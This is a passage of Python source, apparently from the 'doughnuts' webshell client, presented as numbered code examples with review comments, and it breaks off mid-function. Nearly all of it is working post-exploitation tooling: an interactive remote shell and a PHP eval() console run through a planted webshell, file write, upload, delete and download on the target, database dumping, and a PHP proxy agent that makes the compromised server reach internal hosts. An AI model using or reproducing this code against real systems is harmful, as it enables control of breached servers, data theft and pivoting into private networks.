Exemplo n.º 1
def run(*commands):
    """
    shell

    Get a temporary shell of target system by system function or just run a shell command.
    """
    # NOTE(review): the docstring is kept verbatim -- its layout (name, blank
    # line, description) looks like help text consumed elsewhere; confirm
    # before rewording it.
    # `commands` is never read in this body; the input comes from the
    # "raw_command_args" value fetched through gget().
    command = str(value_translation(gget("raw_command_args")))
    # One-shot mode: a command was supplied, so it is wrapped with
    # get_system_code(), sent once, the reply printed, and the function ends.
    if (command):
        res = send(get_system_code(command))
        # A falsy result from send() ends the command without any output.
        if (not res):
            return
        print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
        return
    # Interactive mode from here on.
    print(
        color.cyan(
            "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n"
        ))
    # Single probe request: the code built for "whoami" followed by a PHP
    # print of "@<SERVER_NAME>|<cwd>". Unlike the other send() calls, the
    # result is used without a falsy check.
    res = send(
        f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());'
    ).r_text.strip()
    # Two-name unpack: raises ValueError unless the reply holds exactly one "|".
    prompt, pwd = res.split("|")
    # NOTE(review): the meaning of the two boolean arguments is not visible here.
    set_namespace("webshell", False, True)
    # Remember the current completion wordlist so `finally` can restore it.
    wordlist = gget("webshell.wordlist")
    readline.set_wordlist(NEW_WINDOWS_WORDLIST if (
        is_windows()) else NEW_UNIX_WORDLIST)
    # On Windows the probed "user@host" text is discarded; the prompt is
    # just "<cwd>> ". Elsewhere CR/LF are stripped from the probed text.
    if is_windows():
        prompt = "%s> "
    else:
        prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ "
    try:
        while gget("loop"):
            print(prompt % pwd, end="")
            command = str(value_translation(readline()))
            lower_command = command.lower()
            # Local keywords that leave the loop; nothing is sent for them.
            if (lower_command.lower() in ['exit', 'quit', 'back']):
                print()
                break
            if (command == ''):
                print()
                continue
            # The working directory is tracked client-side in `pwd` and is
            # replayed with chdir() at the start of every request. The value
            # is base64-encoded, presumably so it cannot break out of the
            # single-quoted PHP literal it is placed in.
            b64_pwd = base64_encode(pwd)
            # "cd <path>" is not forwarded as a shell command: it becomes two
            # chdir() calls, and the printed getcwd() replaces `pwd`.
            # The path is sliced from the lower-cased copy of the input.
            if (lower_command.startswith("cd ") and len(lower_command) > 3):
                path = base64_encode(lower_command[3:].strip())
                res = send(
                    f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
                )
                # Returning from inside `try` still runs the `finally` below.
                if (not res):
                    return
                pwd = res.r_text.strip()
            else:
                # Every other line is one request: chdir to the tracked
                # directory, then the wrapper built by get_system_code().
                # For log review: each request built here starts with
                # chdir(base64_decode('...')); how send() encodes it on the
                # wire is not visible in this block.
                res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' +
                           get_system_code(command))
                if (not res):
                    return
                print("\n" + res.r_text.strip() + "\n")
    finally:
        # Restore the completion wordlist saved before the loop.
        readline.set_wordlist(wordlist)
Exemplo n.º 2
def run(*commands):
    """
    webshell

    Get a webshell of target system or just run a webshell command.
    """
    # NOTE(review): the docstring is kept verbatim -- its layout looks like
    # help text consumed elsewhere; confirm before rewording it.
    # `commands` is never read in this body; the input comes from the
    # "raw_command_args" value fetched through gget().
    command = gget("raw_command_args")
    # One-shot mode: the argument text is handed to send() unchanged (no
    # get_system_code() wrapper), i.e. it is treated as code for the remote
    # side rather than as a shell command.
    if (command):
        res = send((command))
        # A falsy result from send() ends the command without any output.
        if (not res):
            return
        print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
        return
    # Interactive mode from here on.
    print(
        color.cyan(
            "Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n"
        ))
    # Probe the remote working directory once. The result is used without the
    # falsy check applied to the other send() calls. The f-prefix has no
    # placeholders to fill.
    pwd = send(f'print(getcwd());').r_text.strip()
    # NOTE(review): the meaning of the two boolean arguments is not visible here.
    set_namespace("webshell", False, True)
    # Remember the current completion wordlist so `finally` can restore it.
    wordlist = gget("webshell.wordlist")
    readline.set_wordlist(NEW_WORDLIST)
    try:
        while gget("loop"):
            print(f"webshell:{pwd} >> ", end="")
            # NOTE(review): the role of the b"(" argument to readline() is not
            # visible in this block -- confirm against the readline helper.
            data = readline(b"(")
            lower_data = data.lower()
            # Local keywords that leave the loop; nothing is sent for them.
            if (lower_data.lower() in ['exit', 'quit', 'back']):
                print()
                break
            if (data == ''):
                print()
                continue
            # Both the typed code and the tracked directory are base64-encoded
            # before being placed inside single-quoted PHP literals.
            data = base64_encode(data)
            b64_pwd = base64_encode(pwd)
            # "cd <path>" is handled as two chdir() calls; the printed
            # getcwd() replaces `pwd`. The path is sliced from the
            # lower-cased copy of the input.
            if (lower_data.startswith("cd ") and len(lower_data) > 3):
                path = base64_encode(lower_data[3:].strip())
                res = send(
                    f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
                )
                # Returning from inside `try` still runs the `finally` below.
                if (not res):
                    return
                pwd = res.r_text.strip()
            else:
                # One request per line: an outer eval() whose string first
                # restores the tracked directory and then eval()s the decoded
                # input. For log review: the request text has the fixed shape
                # eval("chdir(base64_decode('...'));eval(base64_decode('...'));");
                # how send() encodes it on the wire is not visible here.
                res = send(
                    f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{data}\'));");'
                )
                if (not res):
                    return
                print("\n" + res.r_text.strip() + "\n")
    finally:
        # Restore the completion wordlist saved before the loop.
        readline.set_wordlist(wordlist)
Exemplo n.º 3
def run(web_file_path: str, editor: str = ""):
    """
    write

    Write files directly to the target system by notepad / vi as default or your own editor.

    eg: write {web_file_path} {editor=""}
    """
    # The docstring is reproduced verbatim; it presumably doubles as help text.
    # Flow: create an empty scratch file under the configured download
    # directory, let the operator fill it in an editor, then send its content
    # (base64-encoded) inside a file_put_contents() call.
    scratch_name = str(uuid4())
    staging_dir = gget("webshell.download_path", "webshell")
    if not path.exists(staging_dir):
        makedirs(staging_dir)
    local_copy = path.join(staging_dir, scratch_name).replace("\\", "/")
    # Append-mode open only makes sure the file exists before the editor runs.
    with open(local_copy, 'a'):
        pass
    open_editor(local_copy, editor)
    with open(local_copy, "r") as handle:
        encoded_body = base64_encode(handle.read())
        # Only the file body is base64-encoded; web_file_path is placed
        # between the single quotes as given.
        php = f"print(file_put_contents('{web_file_path}', base64_decode('{encoded_body}')));"
        res = send(php)
        if not res:
            # Leaves from inside the `with`; the remove() at the end of the
            # function is not reached on this path.
            return
        reply = res.r_text.strip()
        # The reply counts as success when it starts with a digit, i.e. the
        # printed return value of file_put_contents().
        if match(r"\d+", reply):
            outcome = color.green(f"\nWrite {web_file_path} success.\n")
        else:
            outcome = color.red(f"\nWrite {web_file_path} failed.\n")
        print(outcome)
    remove(local_copy)
Exemplo n.º 4
def get_php(command, database):
    """Return PHP source that runs one database query and echoes the rows.

    The connection preamble comes from ``get_connect_code(dbname=database)``
    and the query text is embedded base64-encoded, to be decoded by the PHP
    side right before ``$con->query()``. The emitted output is one header
    line of column names followed by one line per row, every field
    terminated by ``*,``.

    Args:
        command: Query text to embed (base64-encoded before embedding).
        database: Database name forwarded to ``get_connect_code``.

    Returns:
        The PHP source for the "pdo" or "mysqli" connect type read from
        ``gget("db_connect_type", "webshell")``; an empty string for any
        other connect type.
    """
    driver = gget("db_connect_type", "webshell")
    preamble = get_connect_code(dbname=database)
    encoded_query = base64_encode(command)

    if driver == "pdo":
        # PDO variant: wrapped in try/catch, dies with the PDOException text.
        pdo_template = """try{%s
$r=$con->query(base64_decode('%s'));
$rows=$r->fetchAll(PDO::FETCH_ASSOC);
foreach($rows[0] as $k=>$v){
    echo "$k*,";
}
echo "\\n";
foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}
} catch (PDOException $e){
die("Connect error: ". $e->getMessage());
}"""
        return pdo_template % (preamble, encoded_query)

    if driver == "mysqli":
        # mysqli variant: same output format, no exception handling.
        mysqli_template = """%s
$r=$con->query(base64_decode('%s'));
$rows=$r->fetch_all(MYSQLI_ASSOC);
foreach($rows[0] as $k=>$v){
    echo "$k*,";
}
echo "\\n";
foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}"""
        return mysqli_template % (preamble, encoded_query)

    return ""
Exemplo n.º 5
def run(web_file_path: str):
    """
    write

    Write files directly to the target system by notepad/vi.

    eg: write {web_file_path}
    """
    # The docstring is reproduced verbatim; it presumably doubles as help text.
    # Flow: create an empty local file named after the last component of
    # web_file_path, let the operator fill it in an editor, then send its
    # content (base64-encoded) inside a file_put_contents() call.
    local_name = path.split(web_file_path)[1]
    staging_dir = gget("webshell.download_path", "webshell").replace(":", "_")
    if not path.exists(staging_dir):
        makedirs(staging_dir)
    local_copy = path.join(staging_dir, local_name)
    # Write-mode open creates the file, or truncates an existing one.
    open(local_copy, "w").close()
    open_editor(local_copy)
    with open(local_copy, "r") as handle:
        encoded_body = base64_encode(handle.read())
        # Only the file body is base64-encoded; web_file_path is placed
        # between the single quotes as given.
        php = f"print(file_put_contents('{web_file_path}', base64_decode('{encoded_body}')));"
        res = send(php)
        if not res:
            # Leaves from inside the `with`; the remove() at the end of the
            # function is not reached on this path.
            return
        reply = res.r_text.strip()
        # Success: the reply starts with a word character and is not "0".
        written = match(r"\w+", reply) and reply != '0'
        if written:
            print(color.green(f"\nWrite {web_file_path} success.\n"))
        else:
            failure = color.red(f"\nWrite {web_file_path} failed.")
            failure = failure + color.yellow("\n\nResponse:") + f"\n{reply}\n"
            print(failure)
    remove(local_copy)
Exemplo n.º 6
def get_php(web_file_path: str, force: bool):
    """Return PHP source that stores an uploaded file at ``web_file_path``.

    The path is embedded base64-encoded. The emitted code prints "exist"
    when overwrite protection is on and the path already exists, and
    "success" when ``move_uploaded_file`` moves ``$_FILES["file"]`` there.

    Args:
        web_file_path: Destination path, decoded by the PHP side.
        force: When true, the existence check is disabled (the first slot
            becomes the PHP literal ``false``).

    Returns:
        The PHP source as a string.
    """
    encoded_target = base64_encode(web_file_path)
    # "true" means: refuse to overwrite an existing file.
    keep_existing = str(not force).lower()
    template = """if (isset($_FILES)){
    if (%s and file_exists(base64_decode("%s"))){
        print("exist");
    }
    else if (move_uploaded_file($_FILES["file"]["tmp_name"], base64_decode("%s"))){
        print("success");
    }
}"""
    return template % (keep_existing, encoded_target, encoded_target)
Exemplo n.º 7
def get_php_force(web_file_path: str, force):
    """Return PHP source that checks a path and, on the last branch, unlinks it.

    The emitted code echoes "not writable" when its ``is_writable`` test
    fails, prints "exist" when overwrite protection is on and the path
    exists, and otherwise calls ``unlink`` on the decoded path.

    Args:
        web_file_path: Path embedded base64-encoded in all three slots.
        force: When true, the existence check is disabled (the slot becomes
            the PHP literal ``false``).

    Returns:
        The PHP source as a string.
    """
    encoded_target = base64_encode(web_file_path)
    keep_existing = str(not force).lower()
    # As written, the first slot is handed to PHP's base64_encode() while the
    # other two go through base64_decode().
    template = """if (not is_writable(base64_encode("%s"))) {
echo "not writable";
} else if (%s and file_exists(base64_decode("%s"))){
print("exist");
}
else{
    unlink(base64_decode("%s"));
}"""
    slots = (encoded_target, keep_existing, encoded_target, encoded_target)
    return template % slots
Exemplo n.º 8
def get_php(web_file_path: str):
    """Return PHP source that streams one file back as an attachment.

    The emitted ``download`` function checks ``file_exists``, sets a
    ``Content-type`` of ``application/x-<extension>`` and a
    ``Content-Disposition`` naming the file's basename, then calls
    ``readfile``. Errors from ``file_exists`` and ``readfile`` are
    suppressed with ``@``.

    Args:
        web_file_path: Path of the file to read; embedded base64-encoded.

    Returns:
        The PHP source as a string.
    """
    encoded_source = base64_encode(web_file_path)
    template = """function download($fd){
if (@file_exists($fd)){
$fileinfo = pathinfo($fd);
header("Content-type: application/x-" . $fileinfo["extension"]);
header("Content-Disposition: attachment; filename=" . $fileinfo["basename"]);
@readfile($fd);
}
}
download(base64_decode("%s"));
"""
    return template % encoded_source
Exemplo n.º 9
def get_data_php(web_file_path: str, offset: int, blocksize: int):
    """Return PHP source that reads one block of a file.

    The emitted code opens the file in binary mode, seeks to ``offset``,
    reads ``blocksize`` bytes and echoes them as
    ``base64_encode(gzdeflate(...))``. Nothing is echoed when ``fopen``
    fails (its error is suppressed with ``@``).

    Args:
        web_file_path: Path of the file to read; embedded base64-encoded.
        offset: Byte position formatted into the ``download`` call.
        blocksize: Number of bytes formatted into the ``download`` call.

    Returns:
        The PHP source as a string.
    """
    template = """function download($file, $offset, $size)
{
    $fp = @fopen($file,'rb');
    if ($fp){
        fseek($fp, $offset);
        echo base64_encode(gzdeflate(fread($fp, $size)));
    }
}
download(base64_decode("%s"), %s, %s);
"""
    encoded_source = base64_encode(web_file_path)
    return template % (encoded_source, offset, blocksize)
Exemplo n.º 10
def get_php_decode(web_file_path: str, total_number: int):
    """Return PHP source that reassembles numbered ``.tmp<i>`` parts into one file.

    The emitted code concatenates ``<path>.tmp0`` .. ``<path>.tmp<n-1>``,
    deleting each part after reading it, and stops at the first part whose
    size is 0. When every part was read, the joined text is base64-decoded,
    passed to ``gzipdecode`` (which drops the first 10 and last 8 bytes
    before ``gzinflate``), written to the path, and
    ``success <md5 of the data>`` is echoed if the result is non-empty.

    Args:
        web_file_path: Destination path; embedded base64-encoded.
        total_number: Number of parts, formatted into the loop bound.

    Returns:
        The PHP source as a string.
    """
    encoded_target = base64_encode(web_file_path)
    template = """function gzipdecode($data)
{
    return gzinflate(substr($data,10,-8));
}
$p=base64_decode("%s");
$data="";
$f=true;
for($i=0;$i<%s;$i++){
    $pp="$p.tmp$i";if(filesize($pp)!==0){
        $data .= file_get_contents($pp);unlink($pp);
    } else {
        $f=false;
        break;
    }
}
if($f){
$data=gzipdecode(base64_decode($data));
file_put_contents($p, $data);
if(file_exists($p) && filesize($p) !== 0){echo "success ".md5($data);}
}"""
    return template % (encoded_target, total_number)
Exemplo n.º 11
def get_php_decode(web_file_path: str, number: int):
    """Return PHP source that rebuilds a file from numbered ``.tmp<i>`` parts.

    Unlike a join-then-decode approach, the emitted code decodes each part
    on its own (``gzinflate(base64_decode(...))``), appends it to the
    destination opened with ``fopen($p, 'wb')``, flushes, and deletes the
    part. It stops at the first part whose size is 0 and echoes "success"
    only when all parts were processed and the destination is non-empty.

    Args:
        web_file_path: Destination path; embedded base64-encoded.
        number: Number of parts, formatted into the loop bound.

    Returns:
        The PHP source as a string.
    """
    # The guard in the template reads `if (fp){` exactly as in the original.
    template = """
$p=base64_decode("%s");
$data="";
$f=true;
$fp=@fopen($p, 'wb');
if (fp){
for($i=0;$i<%s;$i++){
    $pp="$p.tmp$i";
    if(filesize($pp)!==0){
        $data=gzinflate(base64_decode(file_get_contents($pp)));
        fwrite($fp, $data);
        fflush($fp);
        unlink($pp);
    } else {
        $f=false;
        break;
    }
}
}
fclose($fp);
if($f){
if(file_exists($p) && filesize($p) !== 0){echo "success";}
}"""
    encoded_target = base64_encode(web_file_path)
    return template % (encoded_target, number)
Exemplo n.º 12
def get_php_clean(web_file_path: str, number: int):
    """Return PHP source that deletes the ``.tmp0`` .. ``.tmp<number-1>`` parts.

    Args:
        web_file_path: Base path of the parts; embedded base64-encoded.
        number: Number of parts, formatted into the loop bound.

    Returns:
        The PHP source as a string.
    """
    template = """for($i=0;$i<%s;$i++){
    unlink(base64_decode("%s").".tmp$i");
}"""
    encoded_base = base64_encode(web_file_path)
    return template % (number, encoded_base)
Exemplo n.º 13
def get_php_upload(web_file_path: str, data: str, number: int):
    """Return PHP source that writes one numbered part file.

    The part path is ``web_file_path`` with ``.tmp<number>`` appended,
    embedded base64-encoded. ``data`` is placed between PHP double quotes
    exactly as given -- presumably the caller passes already-encoded text;
    verify against the caller. The emitted code echoes "success" when the
    written file is non-empty.

    Args:
        web_file_path: Base path of the upload.
        data: Text written into the part file.
        number: Index of the part.

    Returns:
        The PHP source as a string.
    """
    part_path = web_file_path + ".tmp%s" % number
    encoded_part = base64_encode(part_path)
    template = """$p=base64_decode("%s");file_put_contents($p, "%s");if(filesize($p) !== 0){echo "success";}"""
    return template % (encoded_part, data)
Exemplo n.º 14
def get_php(request_target, request_method, request_redirect_method,
            request_data, request_params, request_cookie, redirect_auto,
            redirect_cookie_use, timeout, type):
    """Build the PHP source of a request-forwarding ``Agent`` and return it base64-encoded.

    The ten arguments are substituted, in this order, into the
    ``$REQUEST_URL``, ``$REQUEST_METHOD``, ``$REQUEST_REDIRECT_METHOD``,
    ``$REQUEST_DATA``, ``$REQUEST_PARAMS``, ``$REQUEST_COOKIE``,
    ``$REDIRECT_AUTO``, ``$REDIRECT_COOKIE_USE``, ``$TIMEOUT`` and ``$TYPE``
    assignments at the top of the template. The string values are placed
    between PHP quotes as given (this function does no escaping);
    ``redirect_auto``, ``redirect_cookie_use`` and ``type`` are formatted as
    integers and ``timeout`` as a float.

    The ``#`` comments inside the template are part of the emitted PHP and
    are therefore left in their original language. In English they label,
    in order: proxy target, proxy request method, request method used on a
    redirect, POST data, GET data, cookie data, whether to follow redirects
    automatically, whether to reuse the cookie obtained during a redirect,
    timeout, and the four fetch types.

    ``$TYPE`` selects the transport in ``Agent::__toString``: 1 uses
    ``fsockopen``, 2 uses ``file_get_contents`` with a stream context, 3 uses
    curl, and 4 is a bare ``file_get_contents($request_url)``. For types 1-3
    the fetched body goes through ``get_element``, which appends the content
    of referenced CSS/JS files and a trailing HTML comment holding
    base64-encoded ``CurrentUrl``, ``CurrentCookie`` and ``CurrentHeader``
    values plus ``<CurrentStatus>success</CurrentStatus>``. Only GET and POST
    are in the Agent's allowed-method list.

    Review notes: the generated code makes the host that runs it issue
    outbound requests to a caller-chosen URL and follow redirects to
    wherever the response points, so egress filtering and the PHP settings
    that gate ``fsockopen``, curl and URL-aware ``file_get_contents``
    (``disable_functions``, ``allow_url_fopen``) are the relevant controls.
    The parameter name ``type`` shadows the builtin inside this function.

    Args:
        request_target: URL placed in ``$REQUEST_URL``.
        request_method: Value placed in ``$REQUEST_METHOD``.
        request_redirect_method: Value placed in ``$REQUEST_REDIRECT_METHOD``.
        request_data: Query-string style text placed in ``$REQUEST_DATA``.
        request_params: Query-string style text placed in ``$REQUEST_PARAMS``.
        request_cookie: Cookie text placed in ``$REQUEST_COOKIE``.
        redirect_auto: Integer flag placed in ``$REDIRECT_AUTO``.
        redirect_cookie_use: Integer flag placed in ``$REDIRECT_COOKIE_USE``.
        timeout: Number placed in ``$TIMEOUT``.
        type: Integer 1-4 placed in ``$TYPE``.

    Returns:
        Whatever ``base64_encode`` returns for the filled-in template.
    """
    return base64_encode("""
# 代理目标
$REQUEST_URL= "%s";

# 代理请求方法
$REQUEST_METHOD= '%s';

# 遇到跳转时的请求方法
$REQUEST_REDIRECT_METHOD = '%s';

# POST数据
$REQUEST_DATA='%s';

# GET数据
$REQUEST_PARAMS='%s';

# COOKIE数据
$REQUEST_COOKIE='%s';

# 是否自动跳转
$REDIRECT_AUTO = %d;

# 跳转时使用自动获取的COOKIE
$REDIRECT_COOKIE_USE = %d;

# 超时时间
$TIMEOUT = %f;

# 有4种。
# 前3种分别对应 socket file_get_contents curl 的内网代理
# 最后1种是单纯的file_get_contents(),可以玩php伪协议
$TYPE = %d;


class Agent{

    private $page_content;
    private $type;
    private $timeout;
    private $redirect_auto;
    private $redirect_cookie_use;

    private $request_method;
    private $request_redirect_method;
    private $request_allowed_method;

    private $request_params;
    private $request_data;
    private $request_cookie;

    private $request_url;
    private $request_url_group;
    private $current_url;
    private $header_data;
    private function get_cookie($header_lines){
        foreach ($header_lines as $line) {
            preg_match_all('/set-cookie:(.*)/i', $line, $cookie);
            if (@$cookie[1][0] != NULL) {
                return trim($cookie[1][0]);
            }
        }
        return false;
    }

    private function get_redirect($header_lines){
        foreach($header_lines as $line){
            preg_match_all('/location:(.*)/i',$line,$url);
            if(@$url[1][0]!=NULL){
                return trim($url[1][0]);
            }
        }
        return false;
    }

    private function get_params($params){
        $re_params=[];
        if($params == '') return [''=>''];
        foreach(explode('&',$params) as $line){
            $key_value=explode('=',$line);
            $re_params[urldecode(isset($key_value[0])?$key_value[0]:'')]=urldecode(isset($key_value[1])?$key_value[1]:'');
        }
        return $re_params;
    }

    private function get_query($params_group){
        return isset($params_group['']) and $params_group['']=='' ? '' : http_build_query($params_group);
    }

    private function url_cut($url){
        return parse_url($url);
    }

    private function get_host($url){
        $url_group=$this->url_cut($url);
        if(isset($url_group['scheme'])){
            return $url;
        }else{
            return $url_group['scheme'].'://'.$url_group['host'].(isset($url_group['port'])?'':':'.$url_group['port']);
        }
    }

    private function get_element($host,$body){
        preg_match_all("/<link[\s\S]*?href=['\\"](.*?[.]css.*?)[\\"'][\s\S]*?>/i", $body, $css);
        preg_match_all("/<script[\s\S]*?src=['\\"](.*?[.]js.*?)[\\"'][\s\S]*?>/i", $body, $js);

        foreach ($css[1] as $css_url) {
            $body .= "<style>".@file_get_contents(strpos($css_url, 'http://') == false ? $host . '/' . $css_url:$css_url)."</style>";
        }
        foreach ($js[1] as $js_url) {
            $body .= "<script>" . @file_get_contents(strpos($js_url, 'http://') == false ? $host . '/' . $js_url : $js_url) . "</script>";
        }

        $body.="\\n<!-- \\n<CurrentUrl>".base64_encode($this->current_url)."</CurrentUrl>";
        $body.="<CurrentCookie>".base64_encode($this->request_cookie)."</CurrentCookie>";
        $body.="<CurrentHeader>";
        if(is_array($this->header_data)){
            foreach($this->header_data as $tag){
                if($tag){
                    $body.=base64_encode("[{$tag}]")."|";
                }
            }
        }
        $body.="</CurrentHeader>";
        $body.="<CurrentStatus>success</CurrentStatus>\\n -->";
        return $body;
    }

    private function get302_socket($url)
    {
        try {
            $result="";
            $url_group = $this->url_cut($url);
            $fp = @fsockopen($url_group['host'], isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80), $erro, $errostr, $this->timeout);
            if (!$fp) {
                throw new Exception("Can't connect```");
            } else {

                if(in_array($this->request_redirect_method,$this->request_allowed_method)){
                    if ($this->request_redirect_method === 'POST') {
                        $r = 'POST ' . $url_group['path'] . " HTTP/1.1\\r\\n";
                        $type = "application/x-www-form-urlencoded";
                        $len = 0;
                    } else {
                        $r = 'GET ' . $url_group['path'] . " HTTP/1.1\\r\\n";
                        $type = '';
                        $len = 0;
                    }
                }

                $r .= "Host: " . $url_group['host'] . ':' . (isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80')) . "\r\n";
                $r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n":'';
                $r .= "Content-Type: " . $type . "\\r\\n";
                $r .= "Content-Length: " . $len . "\\r\\n";
                $r .= "Connection: close\\r\\n\\r\\n";
                fputs($fp, $r);
                while (!feof($fp)) {
                    $result .= fgets($fp, 1024);
                }
                fclose($fp);
                if ($result) {
                    list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2);
                    preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code);
                    $header = explode("\\r\\n",$header);
                    $this->header_data = $header;

                    if (300 <= $code[1] and $code[1] < 400) {
                        $redirect_url = $this->get_redirect($header);
                        $cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie;
                        if($this->redirect_cookie_use and $cookie  != ''){
                            $this->request_cookie = $cookie;
                        }
                        if(stripos($redirect_url,'http://') == false){
                            if($redirect_url[0] == '/'){
                                $redirect_url = $this->get_host($url).$redirect_url;
                            }else{
                                $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url;
                            }
                        }
                        $this->current_url = $redirect_url;
                        return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body;
                    } else {
                        return $body;
                    }
                }
            }
        } catch (Exception $e) {
            die("File_Get_Contents_Redirect_error #:" . $e);
        }
    }

    private function get302_fg($url)
    {
        try {
            $url_group = $this->url_cut($url);
            if (in_array($this->request_redirect_method, $this->request_allowed_method)) {
                if ($this->request_redirect_method === 'POST') {
                    $type = "application/x-www-form-urlencoded";
                }
            }
            $opts = array(
                'http' => array(
                    'method' => $this->request_method,
                    'timeout' => $this->timeout,
                    'header' => 'Content-Type: ' . (isset($type) ? '' : $type) . "\\r\\n" .
                        'Content-Length: 0' . "\\r\\n".
                        ($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n":'' )
                )
            );
            $context = stream_context_create($opts);
            $body = @file_get_contents($url, false, $context);
            $result = $http_response_header;
            $this->header_data = $result;
            preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code);
            if (300 <= $code[1] and $code[1] < 400) {
                $redirect_url = $this->get_redirect($result);
                $cookie = $this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie;
                if($this->redirect_cookie_use and $cookie  != ''){
                            $this->request_cookie = $cookie;
                        }
                        if(stripos($redirect_url,'http://') == false){
                            if($redirect_url[0] == '/'){
                                $redirect_url = $this->get_host($url).$redirect_url;
                            }else{
                                $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url;
                            }
                        }
                        $this->current_url = $redirect_url;
                        return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body === false ? "Can't fetch contents```" : $body);
            } else {
                return $body === false ? "Can't fetch contents```" : $body;
            }
        } catch (Exception $e) {
            die("File_Get_Contents_Redirect_error #:" . $e);
        }
    }

    private function get302_c($url){
        try{
            $r = curl_init();
            $url_group = $this->url_cut($url);

            curl_setopt($r, CURLOPT_URL, $url);
            curl_setopt($r, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($r, CURLOPT_CONNECTTIMEOUT, $this->timeout);
            curl_setopt($r, CURLOPT_HEADER, true);

            if($this->request_cookie){
                curl_setopt($r,CURLOPT_COOKIE,$this->request_cookie);
            }

            if(in_array($this->request_redirect_method,$this->request_allowed_method)){
                if ($this->request_redirect_method === 'POST') {
                    curl_setopt($r, CURLOPT_POST, 1);
                }
            }

            $result = curl_exec($r);

            if($result){
                $header_size = curl_getinfo($r, CURLINFO_HEADER_SIZE);
                $header = explode("\\r\\n", substr($result, 0, $header_size));
                $body = substr($result, $header_size);
                $status_code = intval(curl_getinfo($r, CURLINFO_HTTP_CODE));
                $this->header_data = $header;

                curl_close($r);

                if (300 <= $status_code and $status_code < 400) {
                    $redirect_url = $this->get_redirect($header);
                    $cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie;
                    if($this->redirect_cookie_use and $cookie  != ''){
                            $this->request_cookie = $cookie;
                        }
                        if(stripos($redirect_url,'http://') == false){
                            if($redirect_url[0] == '/'){
                                $redirect_url = $this->get_host($url).$redirect_url;
                            }else{
                                $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url;
                            }
                        }
                        $this->current_url = $redirect_url;
                        return $this->redirect_auto ? $this->get302_c($redirect_url) : $body;
                }else{
                    return $body;
                }
            }
        } catch(Exception $e){
            die("CURL_Redirect_error #:" . $e);
        }
    }

    public function getContent_sock()
    {
        try {
            $result = '';
            $fp = @fsockopen($this->request_url_group['host'], isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80, $erro, $errostr, $this->timeout);

            if (!$fp) {
                var_dump($this->request_url_group['scheme'] . '://' . $this->request_url_group['host'] . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/' . '?' . $this->get_query($this->request_params)));
                var_dump(isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80);
                throw new Exception("Can't connect```");
            } else {

                if (in_array($this->request_method, $this->request_allowed_method)) {
                    if ($this->request_method === 'POST') {
                        $r = 'POST ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n";
                        $type = "application/x-www-form-urlencoded";
                        $len = strlen($this->get_query($this->request_data));
                    } else {
                        $r = 'GET ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n";
                        $type = '';
                        $len = 0;
                    }
                }
                $r .= "Host: " . $this->request_url_group['host'] . ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80') . "\r\n";
                $r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n" : '';
                $r .= "Content-Type: " . $type . "\\r\\n";
                $r .= "Content-Length: " . $len . "\\r\\n";
                $r .= "Connection: close\\r\\n";
                $r .= "\\r\\n" . $this->get_query($this->request_data);

                fputs($fp, $r);
                while (!feof($fp)) {
                    $result .= fgets($fp, 1024);
                }
                fclose($fp);

                if ($result) {
                    list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2);
                    preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code);
                    $header = explode("\\r\\n",$header);
                    $this->header_data = $header;
                    
                    if (300 <= $code[1] and $code[1] < 400) {
                        $redirect_url = $this->get_redirect($header);
                        $cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : '';
                        if($this->redirect_cookie_use and $cookie  != ''){
                            $this->request_cookie = $cookie;
                        }
                        if(stripos($redirect_url,'http://') == false){
                            if($redirect_url[0] == '/'){
